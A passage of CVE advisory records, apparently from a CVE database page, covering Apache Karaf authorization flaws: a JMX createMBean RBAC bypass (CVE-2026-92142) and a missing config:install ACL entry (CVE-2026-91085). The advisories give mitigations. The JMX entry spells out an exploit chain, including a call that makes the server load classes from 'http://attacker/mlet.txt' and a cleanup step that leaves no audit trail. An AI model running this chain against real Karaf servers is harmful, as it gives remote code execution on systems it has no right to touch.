                  "description": [
                    {
                      "lang": "eng",
                      "value": "Injection Attack"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "RHSA-2018:1322",
                  "refsource": "REDHAT",
                  "url": "https://access.redhat.com/errata/RHSA-2018:1322"
                },
                {
                  "name": "https://karaf.apache.org/security/cve-2016-8750.txt",
                  "refsource": "CONFIRM",
                  "url": "https://karaf.apache.org/security/cve-2016-8750.txt"
                },
                {
                  "name": "103098",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/103098"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2016-8750",
        "datePublished": "2018-02-19T15:00:00.000Z",
        "dateReserved": "2016-10-18T00:00:00.000Z",
        "dateUpdated": "2024-09-17T00:36:15.735Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2026-92142 (GCVE-0-2026-92142)

    Vulnerability from cvelistv5 – Published: 2026-09-29 08:40 – Updated: 2026-10-01 14:24
    VLAI
    Title
    Apache Karaf: Authorization bypass in JMX MBean lifecycle operations
    Summary
    Apache Karaf exposes a JMX MBeanServer guarded by KarafMBeanServerGuard, which enforces role-based access control (RBAC) on MBean operations invoked over the remote JMX connector (RMI registry/server, enabled by default on ports 1099 and 44444). The guard is implemented as a java.lang.reflect.Proxy around the MBeanServer, and only forwards a fixed list of operation names to the RBAC check, defined in MBeanInvocationHandler#guarded:   private final List<String> guarded = Collections.unmodifiableList( Arrays.asList("invoke", "getAttribute", "getAttributes", "setAttribute", "setAttributes")); The MBean lifecycle operations MBeanServer#createMBean, #registerMBean and #unregisterMBean are not in this list. Calls to these methods are forwarded directly to the underlying MBeanServer with no role check at all, regardless of the roles configured in etc/jmx.acl.*.cfg. As a result, any user who can authenticate to the JMX endpoint, including a user holding only the least-privileged "viewer" role, can call createMBean() to instantiate an arbitrary class as a MBean, and unregisterMBean() to remove it again afterwards, with no authorization check and no audit log entry (logging in KarafMBeanServerGuard only occurs on the RBAC-denial path, which this bypass never reaches). This is significant because javax.management.loading.MLet, a standard JDK MBean, can be instantiated this way. MLet acts as a remote classloader: its getMBeansFromURL(URL) operation fetches an MLet text file from an attacker-controlled URL and instantiates and registers the classes it lists as new MBeans in the target JVM. Reaching this operation still goes through KarafMBeanServerGuard's existing "invoke" check, but the default etc/jmx.acl.cfg grants the "viewer" role to any method name matching the wildcard rule "get* = viewer", a heuristic intended for read-only getters. Because "getMBeansFromURL" happens to start with "get", it also matches that rule, so a default installation grants "viewer" callers permission to invoke it without any Karaf-specific ACL naming MLet at all. Combined with the createMBean gap, this gives a "viewer"-role JMX client a path to remote code execution to the Karaf JVM: * Authenticate to JMX as any user with any role (e.g. "viewer"). * mbs.createMBean("javax.management.loading.MLet", objectName) is not in GUARDED_OPERATIONS, no RBAC check, MLet is instantiated and registered. * mbs.invoke(objectName, "getMBeansFromURL", new Object[]{"http://attacker/mlet.txt"}, ...) is guarded, but the method name matches the default "get* = viewer" ACL rule, so permitted. * The remote .mlet file is fetched and its listed classes are loaded and registered as new MBeans, running attacker-supplied code in the Karaf JVM. * mbs.unregisterMBean(objectName) can be used to remove the MLet afterwards, also not in GUARDED_OPERATIONS, no RBAC check, no audit trail. The fix adds createMBean, registerMBean and unregisterMBean to the guarded operation list, resolves required roles for them from the jmx.acl* configuration by ObjectName and (for createMBean/registerMBean) MBean class name, and ships default etc/jmx.acl.cfg entries restricting all three operations to the "admin" role. This allows deployments to also write class-name-specific rule, e.g.: createMBean(java.lang.String)[/javax\.management\.loading\..*/] = admin Apache Karaf users should upgrade to 4.4.12 or 4.5.0 or later, once released, as soon as possible. Until an upgrade is available, restrict network access to the JMX RMI registry/server ports (1099/44444) to trusted hosts, or avoid issuing any non-"admin" JMX credentiels.
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-10-01 14:23 UTC
    CWE
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.12 (semver)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-09-29T09:15:50.700Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/09/28/11"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 8.8,
                  "baseSeverity": "HIGH",
                  "confidentialityImpact": "HIGH",
                  "integrityImpact": "HIGH",
                  "privilegesRequired": "LOW",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-92142",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-10-01T14:23:22.077130Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-10-01T14:24:03.845Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.12",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "MopMonk-AI \u003cmopmonk-ai@tophant.com\u003e"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "Apache Karaf exposes a JMX MBeanServer guarded by\u0026nbsp;\u003ccode\u003eKarafMBeanServerGuard\u003c/code\u003e, which enforces role-based access control (RBAC) on MBean operations invoked over the remote JMX connector (RMI registry/server, enabled by default on ports 1099 and 44444). The guard is implemented as a j\u003ccode\u003eava.lang.reflect.Proxy\u003c/code\u003e\u0026nbsp;around the MBeanServer, and only forwards a fixed list of operation names to the RBAC check, defined in\u0026nbsp;\u003ccode\u003eMBeanInvocationHandler#guarded\u003c/code\u003e:\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003e\u003ccode\u003e\u0026nbsp; private final List\u0026lt;String\u0026gt; guarded = Collections.unmodifiableList( Arrays.asList(\"invoke\", \"getAttribute\", \"getAttributes\", \"setAttribute\", \"setAttributes\"));\u003c/code\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eThe MBean lifecycle operations\u0026nbsp;\u003ccode\u003eMBeanServer#createMBean\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e#registerMBean\u003c/code\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003e#unregisterMBean\u003c/code\u003e\u0026nbsp;are not in this list. Calls to these methods are forwarded directly to the underlying\u0026nbsp;\u003ccode\u003eMBeanServer\u003c/code\u003e\u0026nbsp;with no role check at all, regardless of the roles configured in\u0026nbsp;\u003cspan\u003eetc/jmx.acl.*.cfg.\u003c/span\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eAs a result, any user who can authenticate to the JMX endpoint, including a user holding only the least-privileged \"\u003ccode\u003eviewer\u003c/code\u003e\" role, can call\u0026nbsp;\u003ccode\u003ecreateMBean()\u003c/code\u003e\u0026nbsp;to instantiate an arbitrary class as a MBean, and\u0026nbsp;\u003ccode\u003eunregisterMBean()\u003c/code\u003e\u0026nbsp;to remove it again afterwards, with no authorization check and no audit log entry (logging in\u0026nbsp;\u003ccode\u003eKarafMBeanServerGuard\u003c/code\u003e\u0026nbsp;only occurs on the RBAC-denial path, which this bypass never reaches).\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eThis is significant because\u0026nbsp;\u003ccode\u003ejavax.management.loading.MLet\u003c/code\u003e, a standard JDK MBean, can be instantiated this way.\u0026nbsp;\u003ccode\u003eMLet\u003c/code\u003e\u0026nbsp;acts as a remote classloader: its\u0026nbsp;\u003ccode\u003egetMBeansFromURL(URL)\u003c/code\u003e\u0026nbsp;operation fetches an\u0026nbsp;\u003ccode\u003eMLet\u003c/code\u003e\u0026nbsp;text file from an attacker-controlled URL and instantiates and registers the classes it lists as new MBeans in the target JVM. Reaching this operation still goes through\u0026nbsp;\u003ccode\u003eKarafMBeanServerGuard\u003c/code\u003e\u0027s existing \"invoke\" check, but the default\u0026nbsp;\u003ccode\u003eetc/jmx.acl.cfg\u003c/code\u003e\u0026nbsp;grants the \"\u003ccode\u003eviewer\u003c/code\u003e\" role to any method name matching the wildcard rule \"\u003ccode\u003eget* = viewer\u003c/code\u003e\", a heuristic intended for read-only getters. Because \"\u003ccode\u003egetMBeansFromURL\u003c/code\u003e\" happens to start with \"\u003ccode\u003eget\u003c/code\u003e\", it also matches that rule, so a default installation grants \"viewer\" callers permission to invoke it without any Karaf-specific ACL naming\u0026nbsp;\u003ccode\u003eMLet\u003c/code\u003e\u0026nbsp;at all. Combined with the createMBean gap, this gives a \"\u003ccode\u003eviewer\u003c/code\u003e\"-role JMX client a path to remote code execution to the Karaf JVM:\u003c/div\u003e\u003cdiv\u003e\u003col\u003e\u003cli\u003eAuthenticate to JMX as any user with any role (e.g. \"\u003ccode\u003eviewer\u003c/code\u003e\").\u003c/li\u003e\u003cli\u003e\u003ccode\u003embs.createMBean(\"javax.management.loading.MLet\", objectName)\u003c/code\u003e\u0026nbsp;is not in\u0026nbsp;\u003ccode\u003eGUARDED_OPERATIONS\u003c/code\u003e, no RBAC check, MLet is instantiated and registered.\u003c/li\u003e\u003cli\u003e\u003ccode\u003embs.invoke(objectName, \"getMBeansFromURL\", new Object[]{\"http://attacker/mlet.txt\"}, ...)\u003c/code\u003e\u0026nbsp;is guarded, but the method name matches the default \"\u003ccode\u003eget* = viewer\u003c/code\u003e\" ACL rule, so permitted.\u003c/li\u003e\u003cli\u003eThe remote\u0026nbsp;\u003ccode\u003e.mlet\u003c/code\u003e\u0026nbsp;file is fetched and its listed classes are loaded and registered as new MBeans, running attacker-supplied code in the Karaf JVM.\u003c/li\u003e\u003cli\u003e\u003ccode\u003embs.unregisterMBean(objectName)\u003c/code\u003e\u0026nbsp;can be used to remove the MLet afterwards, also not in\u0026nbsp;\u003ccode\u003eGUARDED_OPERATIONS\u003c/code\u003e, no RBAC check, no audit trail.\u003c/li\u003e\u003c/ol\u003e\u003c/div\u003e\u003cdiv\u003eThe fix adds\u0026nbsp;\u003ccode\u003ecreateMBean\u003c/code\u003e,\u0026nbsp;\u003ccode\u003eregisterMBean\u003c/code\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003eunregisterMBean\u003c/code\u003e\u0026nbsp;to the guarded operation list, resolves required roles for them from the\u0026nbsp;\u003ccode\u003ejmx.acl*\u003c/code\u003e\u0026nbsp;configuration by\u0026nbsp;\u003ccode\u003eObjectName\u003c/code\u003e\u0026nbsp;and (for\u0026nbsp;\u003ccode\u003ecreateMBean\u003c/code\u003e/\u003ccode\u003eregisterMBean\u003c/code\u003e) MBean class name, and ships default\u0026nbsp;\u003ccode\u003eetc/jmx.acl.cfg\u003c/code\u003e\u0026nbsp;entries restricting all three operations to the \"\u003ccode\u003eadmin\u003c/code\u003e\" role. This allows deployments to also write class-name-specific rule, e.g.:\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003e\u003ccode\u003ecreateMBean(java.lang.String)[/javax\\.management\\.loading\\..*/] = admin\u003c/code\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eApache Karaf users should upgrade to 4.4.12 or 4.5.0 or later, once released, as soon as possible. Until an upgrade is available, restrict network access to the JMX RMI registry/server ports (1099/44444) to trusted hosts, or avoid issuing any non-\"\u003ccode\u003eadmin\u003c/code\u003e\" JMX credentiels.\u003c/div\u003e"
                }
              ],
              "value": "Apache Karaf exposes a JMX MBeanServer guarded by\u00a0KarafMBeanServerGuard, which enforces role-based access control (RBAC) on MBean operations invoked over the remote JMX connector (RMI registry/server, enabled by default on ports 1099 and 44444). The guard is implemented as a java.lang.reflect.Proxy\u00a0around the MBeanServer, and only forwards a fixed list of operation names to the RBAC check, defined in\u00a0MBeanInvocationHandler#guarded:\n\n\n\u00a0 private final List\u003cString\u003e guarded = Collections.unmodifiableList( Arrays.asList(\"invoke\", \"getAttribute\", \"getAttributes\", \"setAttribute\", \"setAttributes\"));\n\n\n\n\nThe MBean lifecycle operations\u00a0MBeanServer#createMBean,\u00a0#registerMBean\u00a0and\u00a0#unregisterMBean\u00a0are not in this list. Calls to these methods are forwarded directly to the underlying\u00a0MBeanServer\u00a0with no role check at all, regardless of the roles configured in\u00a0etc/jmx.acl.*.cfg.\n\n\n\n\nAs a result, any user who can authenticate to the JMX endpoint, including a user holding only the least-privileged \"viewer\" role, can call\u00a0createMBean()\u00a0to instantiate an arbitrary class as a MBean, and\u00a0unregisterMBean()\u00a0to remove it again afterwards, with no authorization check and no audit log entry (logging in\u00a0KarafMBeanServerGuard\u00a0only occurs on the RBAC-denial path, which this bypass never reaches).\n\n\n\n\nThis is significant because\u00a0javax.management.loading.MLet, a standard JDK MBean, can be instantiated this way.\u00a0MLet\u00a0acts as a remote classloader: its\u00a0getMBeansFromURL(URL)\u00a0operation fetches an\u00a0MLet\u00a0text file from an attacker-controlled URL and instantiates and registers the classes it lists as new MBeans in the target JVM. Reaching this operation still goes through\u00a0KarafMBeanServerGuard\u0027s existing \"invoke\" check, but the default\u00a0etc/jmx.acl.cfg\u00a0grants the \"viewer\" role to any method name matching the wildcard rule \"get* = viewer\", a heuristic intended for read-only getters. Because \"getMBeansFromURL\" happens to start with \"get\", it also matches that rule, so a default installation grants \"viewer\" callers permission to invoke it without any Karaf-specific ACL naming\u00a0MLet\u00a0at all. Combined with the createMBean gap, this gives a \"viewer\"-role JMX client a path to remote code execution to the Karaf JVM:\n\n  *  Authenticate to JMX as any user with any role (e.g. \"viewer\").\n  *  mbs.createMBean(\"javax.management.loading.MLet\", objectName)\u00a0is not in\u00a0GUARDED_OPERATIONS, no RBAC check, MLet is instantiated and registered.\n  *  mbs.invoke(objectName, \"getMBeansFromURL\", new Object[]{\"http://attacker/mlet.txt\"}, ...)\u00a0is guarded, but the method name matches the default \"get* = viewer\" ACL rule, so permitted.\n  *  The remote\u00a0.mlet\u00a0file is fetched and its listed classes are loaded and registered as new MBeans, running attacker-supplied code in the Karaf JVM.\n  *  mbs.unregisterMBean(objectName)\u00a0can be used to remove the MLet afterwards, also not in\u00a0GUARDED_OPERATIONS, no RBAC check, no audit trail.\n\n\nThe fix adds\u00a0createMBean,\u00a0registerMBean\u00a0and\u00a0unregisterMBean\u00a0to the guarded operation list, resolves required roles for them from the\u00a0jmx.acl*\u00a0configuration by\u00a0ObjectName\u00a0and (for\u00a0createMBean/registerMBean) MBean class name, and ships default\u00a0etc/jmx.acl.cfg\u00a0entries restricting all three operations to the \"admin\" role. This allows deployments to also write class-name-specific rule, e.g.:\n\n\n\n\ncreateMBean(java.lang.String)[/javax\\.management\\.loading\\..*/] = admin\n\n\n\n\nApache Karaf users should upgrade to 4.4.12 or 4.5.0 or later, once released, as soon as possible. Until an upgrade is available, restrict network access to the JMX RMI registry/server ports (1099/44444) to trusted hosts, or avoid issuing any non-\"admin\" JMX credentiels."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "important"
                },
                "type": "Textual description of severity"
              },
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-862",
                  "description": "CWE-862",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-09-29T08:40:07.961Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://karaf.apache.org/security/cve-2026-92142.txt"
            }
          ],
          "source": {
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: Authorization bypass in JMX MBean lifecycle operations",
          "x_generator": {
            "engine": "Vulnogram 1.0.3"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-92142",
        "datePublished": "2026-09-29T08:40:07.961Z",
        "dateReserved": "2026-09-15T16:59:01.764Z",
        "dateUpdated": "2026-10-01T14:24:03.845Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-91085 (GCVE-0-2026-91085)

    Vulnerability from cvelistv5 – Published: 2026-09-29 08:39 – Updated: 2026-10-01 14:18
    VLAI
    Title
    Apache Karaf: config:install missing ACL entry allows privilege escalation to admin
    Summary
    Apache Karaf's shell/SSH command security is enforced by per-scope ACL configuration files (etc/org.apache.karaf.command.acl.<scope>.cfg). SecuredSessionFactoryImpl.checkSecurity() resolves the roles required for an invocation and, when no ACL rule matches the command, fails open: ACLConfigurationParser.Specificity.NO_MATCH sets passCheck = true. The safety valve for this, karaf.secured.command.compulsory.roles, ships commented out in etc/system.properties, so an unmatched command is allowed for any authenticated user. The shipped org.apache.karaf.command.acl.config ACL (assemblies/features/standard/src/main/feature/feature.xml, mirrored into instance/.../etc/org.apache.karaf.command.acl.config.cfg) has no install entry. It restricts delete to admin, restricts edit/property-*/update on the jmx.acl.*, org.apache.karaf.command.acl.* and org.apache.karaf.service.acl.* PIDs to admin, and allows manager for everything else, but config:install was simply unmatched, and therefore allowed for any authenticated user, including one holding only the viewer role. config:install <url> <finalname> fetches url and writes it into ${karaf.etc} as finalname. It calls PathUtils.checkWithin() to block .. traversal outside karaf.etc, but that folder holds every security-relevant file Karaf ships: users.properties, keys.properties, host.key, and all org.apache.karaf.*.acl.* files, including the very ACL file that (mis)governs this command. With -o/--override, an existing file is overwritten with attacker-controlled bytes fetched from an arbitrary URL. Because felix.fileinstall.dir = ${karaf.etc} (etc/config.properties), Felix FileInstall also watches and reloads any .cfg file dropped there, closing the loop without requiring a restart. By contrast, bundle:install, feature:install and kar:install are all admin-only in their own ACLs, and config:delete is admin in this same ACL, config:install was the outlier. MitigationAdd install = admin in etc/org.apache.karaf.command.acl.config.cfg (create the file is absent), and/or set karaf.secured.command.compulsory.roles=admin in etc/system.properties (and restart) to make unmatched commands fail closed by default.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-10-01 14:17 UTC
    CWE
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.12 (semver)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-09-29T09:15:47.789Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/09/28/10"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "LOW",
                  "baseScore": 6.3,
                  "baseSeverity": "MEDIUM",
                  "confidentialityImpact": "LOW",
                  "integrityImpact": "LOW",
                  "privilegesRequired": "LOW",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-91085",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-10-01T14:17:41.304608Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-10-01T14:18:12.957Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.12",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "Rin Ray \u003crindilray@gmail.com\u003e"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "Apache Karaf\u0027s shell/SSH command security is enforced by per-scope ACL configuration files (\u003ccode\u003eetc/org.apache.karaf.command.acl.\u0026lt;scope\u0026gt;.cfg\u003c/code\u003e).\u0026nbsp;\u003ccode\u003eSecuredSessionFactoryImpl.checkSecurity()\u003c/code\u003e\u0026nbsp;resolves the roles required for an invocation and, when no ACL rule matches the command, \u003cb\u003efails open\u003c/b\u003e:\u0026nbsp;\u003ccode\u003eACLConfigurationParser.Specificity.NO_MATCH\u003c/code\u003e\u0026nbsp;sets\u0026nbsp;\u003ccode\u003epassCheck = true\u003c/code\u003e. The safety valve for this,\u0026nbsp;\u003ccode\u003ekaraf.secured.command.compulsory.roles\u003c/code\u003e, ships commented out in\u0026nbsp;\u003ccode\u003eetc/system.properties\u003c/code\u003e, so an unmatched command is allowed for any authenticated user.\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eThe shipped\u0026nbsp;\u003ccode\u003eorg.apache.karaf.command.acl.config\u003c/code\u003e\u0026nbsp;ACL (\u003ccode\u003eassemblies/features/standard/src/main/feature/feature.xml\u003c/code\u003e, mirrored into\u0026nbsp;\u003ccode\u003einstance/.../etc/org.apache.karaf.command.acl.config.cfg\u003c/code\u003e) has no\u0026nbsp;\u003ccode\u003einstall\u003c/code\u003e\u0026nbsp;entry. It restricts\u0026nbsp;\u003ccode\u003edelete\u003c/code\u003e\u0026nbsp;to\u0026nbsp;\u003ccode\u003eadmin\u003c/code\u003e, restricts\u0026nbsp;\u003ccode\u003eedit\u003c/code\u003e/\u003ccode\u003eproperty-*\u003c/code\u003e/\u003ccode\u003eupdate\u003c/code\u003e\u0026nbsp;on the\u0026nbsp;\u003ccode\u003ejmx.acl.*\u003c/code\u003e,\u0026nbsp;\u003ccode\u003eorg.apache.karaf.command.acl.*\u003c/code\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003eorg.apache.karaf.service.acl.*\u003c/code\u003e\u0026nbsp;PIDs to\u0026nbsp;\u003ccode\u003eadmin\u003c/code\u003e, and allows\u0026nbsp;\u003ccode\u003emanager\u003c/code\u003e\u0026nbsp;for everything else, but\u0026nbsp;\u003ccode\u003econfig:install\u003c/code\u003e\u0026nbsp;was simply unmatched, and therefore allowed for any authenticated user, including one holding only the\u0026nbsp;\u003ccode\u003eviewer\u003c/code\u003e\u0026nbsp;role.\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003e\u003cspan\u003econfig:install \u0026lt;url\u0026gt; \u0026lt;finalname\u0026gt;\u003c/span\u003e\u0026nbsp;fetches\u0026nbsp;\u003ccode\u003eurl\u003c/code\u003e\u0026nbsp;and writes it into\u0026nbsp;\u003ccode\u003e${karaf.etc}\u003c/code\u003e\u0026nbsp;as\u0026nbsp;\u003ccode\u003efinalname\u003c/code\u003e. It calls\u0026nbsp;\u003ccode\u003ePathUtils.checkWithin()\u003c/code\u003e\u0026nbsp;to block\u0026nbsp;\u003ccode\u003e..\u003c/code\u003e\u0026nbsp;traversal outside\u0026nbsp;\u003ccode\u003ekaraf.etc\u003c/code\u003e, but that folder holds every security-relevant file Karaf ships:\u0026nbsp;\u003ccode\u003eusers.properties\u003c/code\u003e,\u0026nbsp;\u003ccode\u003ekeys.properties\u003c/code\u003e,\u0026nbsp;\u003ccode\u003ehost.key\u003c/code\u003e, and all\u0026nbsp;\u003ccode\u003eorg.apache.karaf.*.acl.*\u003c/code\u003e\u0026nbsp;files, including the very ACL file that (mis)governs this command. With\u0026nbsp;\u003ccode\u003e-o\u003c/code\u003e/\u003ccode\u003e--override\u003c/code\u003e, an existing file is overwritten with attacker-controlled bytes fetched from an arbitrary URL.\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eBecause\u0026nbsp;\u003ccode\u003efelix.fileinstall.dir = ${karaf.etc}\u003c/code\u003e\u0026nbsp;(\u003ccode\u003eetc/config.properties\u003c/code\u003e), Felix FileInstall also watches and reloads any\u0026nbsp;\u003ccode\u003e.cfg\u003c/code\u003e\u0026nbsp;file dropped there, closing the loop without requiring a restart.\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eBy contrast,\u0026nbsp;\u003ccode\u003ebundle:install\u003c/code\u003e,\u0026nbsp;\u003ccode\u003efeature:install\u003c/code\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003ekar:install\u003c/code\u003e\u0026nbsp;are all\u0026nbsp;\u003ccode\u003eadmin\u003c/code\u003e-only in their own ACLs, and\u0026nbsp;\u003ccode\u003econfig:delete\u003c/code\u003e\u0026nbsp;is\u0026nbsp;\u003ccode\u003eadmin\u003c/code\u003e\u0026nbsp;in this same ACL,\u0026nbsp;\u003ccode\u003econfig:install\u003c/code\u003e\u0026nbsp;was the outlier.\u003c/div\u003e\u003ch3\u003eMitigation\u003c/h3\u003e\u003cdiv\u003eAdd\u0026nbsp;\u003ccode\u003einstall = admin\u003c/code\u003e\u0026nbsp;in\u0026nbsp;\u003ccode\u003eetc/org.apache.karaf.command.acl.config.cfg\u003c/code\u003e\u0026nbsp;(create the file is absent), and/or set\u0026nbsp;\u003ccode\u003ekaraf.secured.command.compulsory.roles=admin\u003c/code\u003e\u0026nbsp;in\u0026nbsp;\u003ccode\u003eetc/system.properties\u003c/code\u003e\u0026nbsp;(and restart) to make unmatched commands fail closed by default.\u003c/div\u003e"
                }
              ],
              "value": "Apache Karaf\u0027s shell/SSH command security is enforced by per-scope ACL configuration files (etc/org.apache.karaf.command.acl.\u003cscope\u003e.cfg).\u00a0SecuredSessionFactoryImpl.checkSecurity()\u00a0resolves the roles required for an invocation and, when no ACL rule matches the command, fails open:\u00a0ACLConfigurationParser.Specificity.NO_MATCH\u00a0sets\u00a0passCheck = true. The safety valve for this,\u00a0karaf.secured.command.compulsory.roles, ships commented out in\u00a0etc/system.properties, so an unmatched command is allowed for any authenticated user.\n\n\nThe shipped\u00a0org.apache.karaf.command.acl.config\u00a0ACL (assemblies/features/standard/src/main/feature/feature.xml, mirrored into\u00a0instance/.../etc/org.apache.karaf.command.acl.config.cfg) has no\u00a0install\u00a0entry. It restricts\u00a0delete\u00a0to\u00a0admin, restricts\u00a0edit/property-*/update\u00a0on the\u00a0jmx.acl.*,\u00a0org.apache.karaf.command.acl.*\u00a0and\u00a0org.apache.karaf.service.acl.*\u00a0PIDs to\u00a0admin, and allows\u00a0manager\u00a0for everything else, but\u00a0config:install\u00a0was simply unmatched, and therefore allowed for any authenticated user, including one holding only the\u00a0viewer\u00a0role.\n\n\n\n\nconfig:install \u003curl\u003e \u003cfinalname\u003e\u00a0fetches\u00a0url\u00a0and writes it into\u00a0${karaf.etc}\u00a0as\u00a0finalname. It calls\u00a0PathUtils.checkWithin()\u00a0to block\u00a0..\u00a0traversal outside\u00a0karaf.etc, but that folder holds every security-relevant file Karaf ships:\u00a0users.properties,\u00a0keys.properties,\u00a0host.key, and all\u00a0org.apache.karaf.*.acl.*\u00a0files, including the very ACL file that (mis)governs this command. With\u00a0-o/--override, an existing file is overwritten with attacker-controlled bytes fetched from an arbitrary URL.\n\n\n\n\nBecause\u00a0felix.fileinstall.dir = ${karaf.etc}\u00a0(etc/config.properties), Felix FileInstall also watches and reloads any\u00a0.cfg\u00a0file dropped there, closing the loop without requiring a restart.\n\n\n\n\nBy contrast,\u00a0bundle:install,\u00a0feature:install\u00a0and\u00a0kar:install\u00a0are all\u00a0admin-only in their own ACLs, and\u00a0config:delete\u00a0is\u00a0admin\u00a0in this same ACL,\u00a0config:install\u00a0was the outlier.\n\nMitigationAdd\u00a0install = admin\u00a0in\u00a0etc/org.apache.karaf.command.acl.config.cfg\u00a0(create the file is absent), and/or set\u00a0karaf.secured.command.compulsory.roles=admin\u00a0in\u00a0etc/system.properties\u00a0(and restart) to make unmatched commands fail closed by default."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "moderate"
                },
                "type": "Textual description of severity"
              },
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
